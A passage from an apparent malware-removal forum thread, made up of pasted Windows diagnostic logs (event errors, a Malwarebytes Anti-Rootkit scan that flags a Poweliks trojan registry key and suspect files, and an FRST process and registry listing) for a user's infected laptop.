Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)</p><p> at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at 
System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()</p><p> at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])</p><p> at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()</p><p> at System.Management.Automation.Cmdlet.DoProcessRecord()</p><p> at System.Management.Automation.CommandProcessor.ProcessRecord()</p><p> at System.Management.Automation.CommandProcessorBase.DoExecute()</p><p> at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)</p><p> at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)</p><p> at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], 
System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)</p><p> at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()</p><p> at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)</p><p> at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, 
System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])</p><p> at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])</p><p> at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()</p><p> at System.Management.Automation.Cmdlet.DoProcessRecord()</p><p> at System.Management.Automation.CommandProcessor.ProcessRecord()</p><p> at System.Management.Automation.CommandProcessorBase.DoExecute()</p><p> at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)</p><p> at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)</p><p> at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)</p><p> at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at 
System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)</p><p> at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)</p><p> at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)</p><p> at System.Management.Automation.DlrScriptCommandProcessor.Complete()</p><p> at System.Management.Automation.CommandProcessorBase.DoComplete()</p><p> at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)</p><p> at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)</p><p> at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()</p><p> at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()</p><p> at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()</p><p> at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)</p><p> at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)</p><p> at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)</p><p> at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)</p><p> at 
System.Threading.ThreadHelper.ThreadStart()</p><p></p><p>Error: (11/30/2014 07:39:05 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a55f</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x1f5ec</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 07:20:52 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x6c90</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 07:19:12 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010888a</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x2923c</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full 
name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p></p><p>System errors:</p><p>=============</p><p>Error: (11/30/2014 09:08:33 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:08:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:07:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:07:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 09:00:52 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)</p><p>Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 51. 
The Windows SChannel error state is 900.</p><p></p><p>Error: (11/30/2014 08:56:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:55:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:55:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:54:29 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/30/2014 08:53:58 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p></p><p>Microsoft Office Sessions:</p><p>=========================</p><p></p><p>==================== Memory info =========================== </p><p></p><p>Processor: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz</p><p>Percentage of memory in use: 28%</p><p>Total physical RAM: 8074.77 MB</p><p>Available physical RAM: 5737.82 MB</p><p>Total Pagefile: 16266.77 MB</p><p>Available Pagefile: 13875.43 MB</p><p>Total Virtual: 8192 MB</p><p>Available Virtual: 8191.78 MB</p><p></p><p>==================== Drives ================================</p><p></p><p>Drive c: () (Fixed) (Total:671.53 GB) (Free:279.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]</p><p>Drive d: (RECOVERY) (Fixed) (Total:26.33 GB) (Free:3.11 GB) NTFS ==>[System with boot components (obtained from reading drive)]</p><p></p><p>==================== MBR & Partition Table ==================</p><p></p><p>========================================================</p><p>Disk: 0 (Size: 698.6 GB) (Disk ID: 04463ED8)</p><p></p><p>Partition: GPT Partition Type.</p><p></p><p>==================== End Of Log ============================</p></blockquote><p></p>
[QUOTE="stanm, post: 308296, member: 31324"] Malwarebytes Anti-Rootkit BETA 1.08.2.1001 [url="http://www.malwarebytes.org"]www.malwarebytes.org[/url] Database version: v2014.12.01.03 Windows 8 x64 NTFS Internet Explorer 10.0.9200.16466 johnsmith :: JASONSTORM [administrator] 12/1/2014 7:59:02 AM mbar-log-2014-12-01 (07-59-02).txt Scan type: Quick scan Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken Scan options disabled: Objects scanned: 337935 Time elapsed: 55 minute(s), 22 second(s) Memory Processes Detected: 0 (No malicious items detected) Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 1 HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} (Trojan.Poweliks.B) -> Delete on reboot. [d1d60459d6a63cfaeba244be25db7987] Registry Values Detected: 0 (No malicious items detected) Registry Data Items Detected: 0 (No malicious items detected) Folders Detected: 0 (No malicious items detected) Files Detected: 3 C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe (TheftMarker.Crude) -> Delete on reboot. [ccdb7ae374083600e207281603ff0ef2] C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak (TheftMarker.Crude) -> Delete on reboot. [bdea3627ee8e61d525c49f9fd032718f] C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak (TheftMarker.Crude) -> Delete on reboot. 
[f2b54914eb912f0744a54fefd42ee21e] Physical Sectors Detected: 0 (No malicious items detected) (end) Malwarebytes Anti-Rootkit BETA 1.08.2.1001 (c) Malwarebytes Corporation 2011-2012 OS version: 6.2.9200 Windows 8 x64 Account is Administrative Internet Explorer version: 10.0.9200.16466 File system is: NTFS Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED CPU speed: 2.494000 GHz Memory total: 8467005440, free: 6794969088 --------------------------------------- Malwarebytes Anti-Rootkit BETA 1.08.2.1001 (c) Malwarebytes Corporation 2011-2012 OS version: 6.2.9200 Windows 8 x64 Account is Administrative Internet Explorer version: 10.0.9200.16466 File system is: NTFS Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED CPU speed: 2.494000 GHz Memory total: 8467005440, free: 6802513920 Downloaded database version: v2014.12.01.03 Downloaded database version: v2014.12.01.01 ======================================= Initializing... This version of Malwarebytes Anti-Rootkit requires you to completely exit the Malwarebytes Anti-Malware application to continue. Initializing... 
====================== ------------ Kernel report ------------ 12/01/2014 07:58:53 ------------ Loaded modules ----------- ----------- End ----------- Done! <<<1>>> Upper Device Name: \Device\Harddisk0\DR0 Upper Device Object: 0xfffffa80096d8060 Upper Device Driver Name: \Driver\disk\ Lower Device Name: \Device\00000047\ Lower Device Object: 0xfffffa8007d6f2b0 Lower Device Driver Name: \Driver\iaStorA\ <<<2>>> Physical Sector Size: 512 Drive: 0, DevicePointer: 0xfffffa80096d8060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\ --------- Disk Stack ------ DevicePointer: 0xfffffa80096d8b10, DeviceName: Unknown, DriverName: \Driver\partmgr\ DevicePointer: 0xfffffa80096d8060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\ DevicePointer: 0xfffffa8008796b10, DeviceName: Unknown, DriverName: \Driver\hpdskflt\ DevicePointer: 0xfffffa8007d6f2b0, DeviceName: \Device\00000047\, DriverName: \Driver\iaStorA\ ------------ End ---------- Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\ Upper DeviceData: 0x0, 0x0, 0x0 Lower DeviceData: 0x0, 0x0, 0x0 <<<3>>> Volume: C: File system type: NTFS SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes <<<2>>> <<<3>>> Volume: C: File system type: NTFS SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes Scanning drivers directory:
C:\WINDOWS\SYSTEM32\drivers... Done! Drive 0 This is a System drive Scanning MBR on drive 0... Inspecting partition table: This drive is a GPT Drive. MBR Signature: 55AA Disk Signature: 4463ED8 GPT Protective MBR Partition information: Partition 0 type is EFI-GPT (0xee) Partition is NOT ACTIVE. Partition starts at LBA: 1 Numsec = 1465149167 Partition 1 type is Empty (0x0) Partition is NOT ACTIVE. Partition starts at LBA: 0 Numsec = 0 Partition 2 type is Empty (0x0) Partition is NOT ACTIVE. Partition starts at LBA: 0 Numsec = 0 Partition 3 type is Empty (0x0) Partition is NOT ACTIVE. Partition starts at LBA: 0 Numsec = 0 GPT Partition information: GPT Header Signature 4546492050415254 GPT Header Revision 65536 Size 92 CRC 4060582503 GPT Header CurrentLba = 1 BackupLba 1465149167 GPT Header FirstUsableLba 34 LastUsableLba 1465149134 GPT Header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3 GPT Header Contains 128 partition entries starting at LBA 2 GPT Header Partition entry size = 128 Backup GPT header Signature 4546492050415254 Backup GPT header Revision 65536 Size 92 CRC 4060582503 Backup GPT header CurrentLba = 1465149167 BackupLba 1 Backup GPT header FirstUsableLba 34 LastUsableLba 1465149134 Backup GPT header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3 Backup GPT header Contains 128 partition entries starting at LBA 1465149135 Backup GPT header Partition entry size = 128 Partition 0 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac Partition ID cc93694e-549f-490e-b691-2744edbc3472 FirstLBA 2048 Last LBA 821247 Attributes 1 Partition Name Basic data partition Partition 1 Type c12a7328-f81f-11d2-ba4b-0a0c93ec93b Partition ID 59e6ba52-631b-42dd-856d-9d753560f97b FirstLBA 821248 Last LBA 1353727 Attributes 0 Partition Name EFI system partition GPT Partition 1 is bootable Partition 2 Type e3c9e316-b5c-4db8-817d-f92df0215ae Partition ID 9a4c6918-cf88-492b-84ee-b13ab7aa249f FirstLBA 1353728 Last LBA 1615871 Attributes 0 Partition Name Microsoft reserved partition Partition 3 Type 
ebd0a0a2-b9e5-4433-87c0-68b6b72699c7 Partition ID 318bc6ab-44d7-469d-9893-cca19ba3d3a FirstLBA 1615872 Last LBA 1409910783 Attributes 0 Partition Name Basic data partition
Partition 4 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7 Partition ID fafe7be9-88d0-424f-8a61-d41894123c FirstLBA 1409910784 Last LBA 1465135103 Attributes 1 Partition Name Basic data partition
Disk Size: 750156374016 bytes
Sector size: 512 bytes
Done!
Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe --> [TheftMarker.Crude]
Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak --> [TheftMarker.Crude]
Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak --> [TheftMarker.Crude]
Infected: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} --> [Trojan.Poweliks.B]
Scan finished
Creating System Restore point...
Cleaning up...
Removal scheduling successful. System shutdown needed.
System shutdown occurred
=======================================
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 30-11-2014 01
Ran by johnsmith (administrator) on JASONSTORM on 01-12-2014 09:52:05
Running from C:\Users\johnsmith\Desktop\removal tools
Loaded Profile: johnsmith (Available profiles: johnsmith)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(IvoSoft) C:\Program Files\Classic Shell\ClassicShellService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(ArcSoft Inc.)
C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe () C:\Windows\System32\valWBFPolicyService.exe (AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe (CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe (AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe (AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (Hewlett-Packard Development Company, L.P.) 
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\plugin-nm-server.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-07-21] (IDT, Inc.) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2916152 2012-08-24] (Synaptics Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated) HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.) 
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-31] (Hewlett-Packard Development Company, L.P.) HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.) HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-18] (Adobe Systems Incorporated) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [FreeAC] => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe [1330008 2012-12-11] (Comfort Software Group) ShellIconOverlayIdentifiers: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft) ShellIconOverlayIdentifiers-x32: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) 
HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.com/rover/1/711-154371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS
